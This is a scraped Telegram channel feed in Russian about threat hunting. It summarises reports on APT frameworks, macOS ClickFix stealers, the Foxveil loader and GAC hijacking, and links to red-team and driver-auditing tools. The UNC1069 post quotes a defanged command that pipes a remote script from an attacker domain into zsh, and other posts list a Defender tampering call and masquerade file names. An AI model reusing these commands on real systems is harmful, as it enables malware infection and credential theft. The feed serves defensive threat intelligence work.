PeckBirdy: A Versatile Script Framework for LOLBins Exploitation Used by China-aligned Threat Groups
Trend Micro выявила JScript-фреймворк командного управления (C&C) под названием PeckBirdy, который активно используется прокитайскими APT-акторами с 2023 года. Фреймворк разработан для гибкого развёртывания в различных средах, включая браузеры, MSHTA, WScript и NodeJS, за счёт злоупотребления living-off-the-land бинарями (LOLBins). PeckBirdy выполняет несколько ролей на протяжении всей цепочки атаки - от начального доступа через watering-hole-атаки до бокового перемещения и управления бэкдорами по C&C-каналу.
Задокументированы две основные кампании, использующие PeckBirdy: SHADOW-VOID-044 и SHADOW-EARTH-045. Кампания SHADOW-VOID-044 нацелена на китайскую индустрию онлайн-гемблинга и разворачивает модульные бэкдоры HOLODONUT и MKDOOR. Кампания SHADOW-EARTH-045 ориентирована на государственные и частные организации в Азии, где PeckBirdy применяется для сбора учётных данных и в качестве канала удалённого доступа. В отчёте эти кампании связываются с известными группировками, такими как UNC3569, Earth Baxia и другими, при этом подчёркивается сложная сеть совместно используемых инструментов и инфраструктуры, включая применение похищенных сертификатов для подписи кода.
🔗 https://www.trendmicro.com/en_us/research/26/a/peckbirdy-script-framework.html
🦔 THF
Trend Micro выявила JScript-фреймворк командного управления (C&C) под названием PeckBirdy, который активно используется прокитайскими APT-акторами с 2023 года. Фреймворк разработан для гибкого развёртывания в различных средах, включая браузеры, MSHTA, WScript и NodeJS, за счёт злоупотребления living-off-the-land бинарями (LOLBins). PeckBirdy выполняет несколько ролей на протяжении всей цепочки атаки - от начального доступа через watering-hole-атаки до бокового перемещения и управления бэкдорами по C&C-каналу.
Задокументированы две основные кампании, использующие PeckBirdy: SHADOW-VOID-044 и SHADOW-EARTH-045. Кампания SHADOW-VOID-044 нацелена на китайскую индустрию онлайн-гемблинга и разворачивает модульные бэкдоры HOLODONUT и MKDOOR. Кампания SHADOW-EARTH-045 ориентирована на государственные и частные организации в Азии, где PeckBirdy применяется для сбора учётных данных и в качестве канала удалённого доступа. В отчёте эти кампании связываются с известными группировками, такими как UNC3569, Earth Baxia и другими, при этом подчёркивается сложная сеть совместно используемых инструментов и инфраструктуры, включая применение похищенных сертификатов для подписи кода.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Вот смотрите, коротко к чему приводит Threat Hunting 😃 💊
Решая нетривиальную задачу в атакованной сети, человек просто идет и пишет тул как настоящий блэкхэт, так как зона мониторинга может быть ограничена, только вот он ищет пивот поинты APT, а не нацелен на файлики и конф. данные.
#IncidentResponce #ThreatHunting
Тулза вот доступна тут:
🔗 https://github.com/s0ld13rr/tarahunter
Автор🎩 :
https://t.me/s0ld13r_ch/352
Решая нетривиальную задачу в атакованной сети, человек просто идет и пишет тул как настоящий блэкхэт, так как зона мониторинга может быть ограничена, только вот он ищет пивот поинты APT, а не нацелен на файлики и конф. данные.
#IncidentResponce #ThreatHunting
Тулза вот доступна тут:
Автор
https://t.me/s0ld13r_ch/352
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥4😁4
UNC1069 Targets Cryptocurrency Sector with New Tooling and AI-Enabled Social Engineering
Хороший заголовок?😃
UNC1069 провёл целевую атаку на представителя криптосектора через социальную инженерию. Жертву завели в фейковую Zoom-встречу через скомпрометированный Telegram-аккаунт, имитировали проблемы со звуком и применили ClickFix - запуск «диагностических» команд привёл к заражению macOS
После выполнения команд был развернут многоступенчатый тулчейн: WAVESHAPER → HYPERCALL → HIDDENCALL / SUGARLOADER / SILENCELIFT, а затем два стилера - DEEPBREATH (TCC bypass, Keychain, браузеры, Telegram, Notes) и CHROMEPUSH (Chromium-extension, cookies, keylogging). Цель - массовый сбор учётных данных и сессий для финансовой кражи и последующих атак.
Но самое интересное из этого текста мы говорит не восстановили AI, но чет похожее видели, как по вашему это норм или стрем?😃
🔗 https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering
🦔 THF
Хороший заголовок?
UNC1069 провёл целевую атаку на представителя криптосектора через социальную инженерию. Жертву завели в фейковую Zoom-встречу через скомпрометированный Telegram-аккаунт, имитировали проблемы со звуком и применили ClickFix - запуск «диагностических» команд привёл к заражению macOS
system_profiler SPAudioData
softwareupdate --evaluate-products --products audio --agree-to-license
curl -A audio -s hxxp://mylingocoin[.]com/audio/fix/6454694440 | zsh
system_profiler SPSoundCardData
softwareupdate --evaluate-products --products soundcard
system_profiler SPSpeechData
softwareupdate --evaluate-products --products speech --agree-to-license
После выполнения команд был развернут многоступенчатый тулчейн: WAVESHAPER → HYPERCALL → HIDDENCALL / SUGARLOADER / SILENCELIFT, а затем два стилера - DEEPBREATH (TCC bypass, Keychain, браузеры, Telegram, Notes) и CHROMEPUSH (Chromium-extension, cookies, keylogging). Цель - массовый сбор учётных данных и сессий для финансовой кражи и последующих атак.
Но самое интересное из этого текста мы говорит не восстановили AI, но чет похожее видели, как по вашему это норм или стрем?
While Mandiant was unable to recover forensic evidence to independently verify the use of AI models in this specific instance, the reported ruse is similar to a previously publicly reported incident with similar characteristics, where deepfakes were also allegedly used.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Foxveil – New Malware Loader Abusing Cloudflare, Discord, and Netlify as Staging Infrastructure
Foxveil - initial-stage loader, активен с августа 2025. Использует Cloudflare Pages, Netlify и Discord attachments как staging вместо собственного C2.
Цепочка
• Запуск вредоносного EXE/DLL.
• Загрузка shellcode (часто Donut) с:
*.pages.dev
*.netlify.app
Discord attachment
• Инжект и выполнение в памяти.
Разница версий
v1
• Спавнит fake
• Early Bird APC injection
• Persistence через регистрацию сервиса (AarSvc)
• Дроп в
Runtime string mutation
v2
• Чаще получает shellcode через Discord
• Self-injection
• WMI-вызов к Defender:
Маскировка payload’ов
Файлы пишутся как:🤩
🔗 https://www.catonetworks.com/blog/cato-ctrl-foxveil-new-malware/
🦔 THF
Foxveil - initial-stage loader, активен с августа 2025. Использует Cloudflare Pages, Netlify и Discord attachments как staging вместо собственного C2.
Цепочка
• Запуск вредоносного EXE/DLL.
• Загрузка shellcode (часто Donut) с:
*.pages.dev
*.netlify.app
Discord attachment
• Инжект и выполнение в памяти.
Разница версий
v1
• Спавнит fake
svchost.exe• Early Bird APC injection
• Persistence через регистрацию сервиса (AarSvc)
• Дроп в
C:\Windows\SysWOW64\Runtime string mutation
v2
• Чаще получает shellcode через Discord
• Self-injection
• WMI-вызов к Defender:
MSFT_MpPreference RemoveExclusionPath
• Маскировка payload’ов
Файлы пишутся как:
sms.exe
sihost.exe
taskhostw.exe
taskhostw1.exe
audiodg.exe
real1.exe
real2.exe
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
GAC вещичка которую можно было видеть в разных APT компаниях в частности абуз IIS
Global Assembly Cache is a system-wide repository in the .NET framework that stores strong named (name + version + culture + public key token identity) assemblies so multiple applications can use themSwithout version conflicts. On Windows systems, GAC is typically under %windir%\Microsoft.NET\assembly, and assemblies stored there are intended to be globally available to CLR-hosting processes (services, IIS, desktop applications etc.). Threat actors with elevated privileges on the asset could tamper, an assembly inside the GAC folder to execute arbitrary code. The technique could establish persistence by blending into a trusted process.
🔗 https://ipurple.team/2026/02/10/gac-hijacking/
🦔
Global Assembly Cache is a system-wide repository in the .NET framework that stores strong named (name + version + culture + public key token identity) assemblies so multiple applications can use themSwithout version conflicts. On Windows systems, GAC is typically under %windir%\Microsoft.NET\assembly, and assemblies stored there are intended to be globally available to CLR-hosting processes (services, IIS, desktop applications etc.). Threat actors with elevated privileges on the asset could tamper, an assembly inside the GAC folder to execute arbitrary code. The technique could establish persistence by blending into a trusted process.
Please open Telegram to view this post
VIEW IN TELEGRAM
Red Team вооружается все больше, а это значит что тест инфраструктуры будет становиться еще ниже радаров и просто так этих ребят без ТН мало XDR решений подсветит 😃
Rust based
Generate DLL proxy/sideload projects. Automatically parses PE export tables and generates ready-to-compile project for red team engagements.
LazyDLLSideload automates the process of creating DLL proxying and sideloading implants. It:
• windows_sys Ecosystem.
• Parses any Windows DLL to extract exported functions
• Generates complete Rust projects
Supports two operation modes: • Sideload and Proxy
• Uses dyncvoke for dynamic invocation and syscall execution..
Минимальный набор hunting-пивотов:
Process → ImageLoad: процесс X грузит DLL Y из user-writable/неожидаемого каталога.
FileCreate → ProcessStart: DLL появилась в каталоге приложения → затем старт/рестарт приложения
Может быть и так что будут подкладывать DLL с одинаковым именем, но это уже другая механика.
🔗 https://github.com/Whitecat18/LazyDLLSideload/tree/main
Rust based
Generate DLL proxy/sideload projects. Automatically parses PE export tables and generates ready-to-compile project for red team engagements.
LazyDLLSideload automates the process of creating DLL proxying and sideloading implants. It:
• windows_sys Ecosystem.
• Parses any Windows DLL to extract exported functions
• Generates complete Rust projects
Supports two operation modes: • Sideload and Proxy
• Uses dyncvoke for dynamic invocation and syscall execution..
Минимальный набор hunting-пивотов:
Process → ImageLoad: процесс X грузит DLL Y из user-writable/неожидаемого каталога.
FileCreate → ProcessStart: DLL появилась в каталоге приложения → затем старт/рестарт приложения
Может быть и так что будут подкладывать DLL с одинаковым именем, но это уже другая механика.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
1
BYOVD hunter - да да, с помощью этого инструмента можно найти уязвимые драйвера, но мы то будем использовать чтобы провести аудит своего хоста? 😃
🔗 https://github.com/BlackSnufkin/HolyGrail
🦔
Используем на свой страх и риск, другой способ идти на LoLdrivers
Используем на свой страх и риск, другой способ идти на LoLdrivers
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4🥱1